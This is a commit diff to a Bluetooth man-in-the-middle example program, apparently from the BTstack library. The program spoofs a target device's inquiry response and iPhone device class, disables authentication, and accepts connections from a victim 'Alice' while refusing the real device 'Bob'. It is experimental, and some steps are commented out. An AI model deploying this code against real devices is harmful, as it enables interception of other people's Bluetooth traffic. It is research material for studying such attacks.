try different stuff

example/mitm.c

@@ -13,6 +13,7 @@
 #include "../src/run_loop.h"
 #include "../src/hci.h"
 
+#define NAME "BTstack-in-the-Middle"
 #define EIR_LEN 240
 
 // there is the target: BOB
@@ -53,15 +54,17 @@ void data_handler(uint8_t *packet, uint16_t size){
 }
 
 void event_handler(uint8_t *packet, uint16_t size){
-	
 	// bt stack activated, get started - set local name
 	if (packet[0] == HCI_EVENT_BTSTACK_WORKING ||
 	   (packet[0] == HCI_EVENT_BTSTACK_STATE && packet[2] == HCI_STATE_WORKING)) {
-        bt_send_cmd(&hci_write_local_name, "BTstack-in-the-Middle");
+		bt_send_cmd(&hci_write_local_name, NAME);
+	}
+	if ( COMMAND_COMPLETE_EVENT(packet, hci_write_local_name) ) {
+		bt_send_cmd(&hci_write_class_of_device, 0x7A020C);  // used on iPhone
 	}
 	
 	// use pairing yes/no
-    if ( COMMAND_COMPLETE_EVENT(packet, hci_write_local_name) ) {
+	if ( COMMAND_COMPLETE_EVENT(packet, hci_write_class_of_device) ) {
 		bt_send_cmd(&hci_write_authentication_enable, 0);
 	}
 	
@@ -75,9 +78,13 @@ void event_handler(uint8_t *packet, uint16_t size){
 		bt_send_cmd(&hci_set_event_mask, 0xffffffff, 0x1fffffff);
 	}
 
+	// fine with us, too
+	if ( COMMAND_COMPLETE_EVENT(packet, hci_set_event_mask) ) {
+		bt_send_cmd(&hci_write_simple_pairing_mode, 1);
+	}
 		
 	// start inquiry
-	if ( COMMAND_COMPLETE_EVENT(packet, hci_set_event_mask) ) {
+	if ( COMMAND_COMPLETE_EVENT(packet, hci_write_simple_pairing_mode) ) {
 		// enable capure
 		bt_send_cmd(&btstack_set_acl_capture_mode, 1);
 		
@@ -86,23 +93,43 @@ void event_handler(uint8_t *packet, uint16_t size){
 	}
 	
 	// process EIR responses
-	if (packet[0] == HCI_EVENT_EXTENDED_INQUIRY_RESPONSE && packet[17] && !bob_got_EIR) {
+	if (packet[0] == HCI_EVENT_EXTENDED_INQUIRY_RESPONSE && packet[17]) {
-		printf("2. Got BOB's EIR.\n");
+		bt_flip_addr(temp_addr, &packet[3]); 
-		memcpy(bob_EIR, &packet[17], EIR_LEN);
+		if (BD_ADDR_CMP(temp_addr, bob_addr)) {
+			printf("2. Got BOB's EIR. ");
+			int i, k;
+			bzero(bob_EIR, EIR_LEN);
+			for (i=17, k=0;i<EIR_LEN && packet[i]; i += packet[i] + 1, k += bob_EIR[k] + 1){
+				if (packet[i+1] == 0x09) {
+					// complete name id -- use own
+					bob_EIR[k+0] = 1 + strlen(NAME);
+					bob_EIR[k+1] = 0x09;
+					memcpy(&bob_EIR[k+2], NAME, strlen(NAME));
+				} else {
+					// vendor specific
+					if (packet[i+1] == 0x0ff ) {
 						bob_got_EIR = 1;
+					}
+					memcpy(&bob_EIR[k], &packet[i], packet[i]+1);
+				}
+			}
+			hexdump(&bob_EIR, k);
+			printf("\n\n");
 			bob_clock_offset = READ_BT_16(packet, 14);
 			bob_page_scan_repetition_mode = packet[9];
+		}
+
 		// stop inquiry
-		bt_send_cmd(&hci_inquiry_cancel);
+		// bt_send_cmd(&hci_inquiry_cancel);
 	}
 	
 	// Inquiry done, set EIR
 	if (packet[0] == HCI_EVENT_INQUIRY_COMPLETE || COMMAND_COMPLETE_EVENT(packet, hci_inquiry_cancel)){
 		if (!inquiry_done){
 			inquiry_done = 1;
-			printf("3. Inquiry Complete\n", bob_got_EIR);
+			printf("3. Inquiry Complete\n");
 			if (bob_got_EIR){
-				printf("4. Set own EIR to Bob's.\n");
+				printf("4. Set EIR to Bob's.\n");
 				bt_send_cmd(&hci_write_extended_inquiry_response, 0, bob_EIR);	
 			} else {
 				// failed to get BOB's EIR
@@ -113,17 +140,21 @@ void event_handler(uint8_t *packet, uint16_t size){
 	// Connect to BOB
 	if ( COMMAND_COMPLETE_EVENT(packet, hci_write_extended_inquiry_response) ) {
 		printf("5. Waiting for Alice!...\n");
+		// bt_send_cmd(&hci_write_scan_enable, 3); // 3 inq scan + page scan
 		// bt_send_cmd(&hci_create_connection, &addr, 0x18, page_scan_repetition_mode, 0, 0x8000 || clock_offset, 0);
 	}
 
 	// accept incoming connections
 	if (packet[0] == HCI_EVENT_CONNECTION_REQUEST){
-		printf("-> Connection request from ");
 		bt_flip_addr(temp_addr, &packet[2]); 
-		print_bd_addr(temp_addr);
+		if (BD_ADDR_CMP(temp_addr, bob_addr) ){
-		printf(", sending accept.\n");
+			printf("-> Connection request from BOB. Denying\n");
+			// bt_send_cmd(&hci_accept_connection_request, &temp_addr, 1);
+		} else {
+			printf("-> Connection request from Alice. Sending Accept\n");
 			bt_send_cmd(&hci_accept_connection_request, &temp_addr, 1);
 		}
+	}
 	
 	// handle connections
 	if (packet[0] == HCI_EVENT_CONNECTION_COMPLETE) {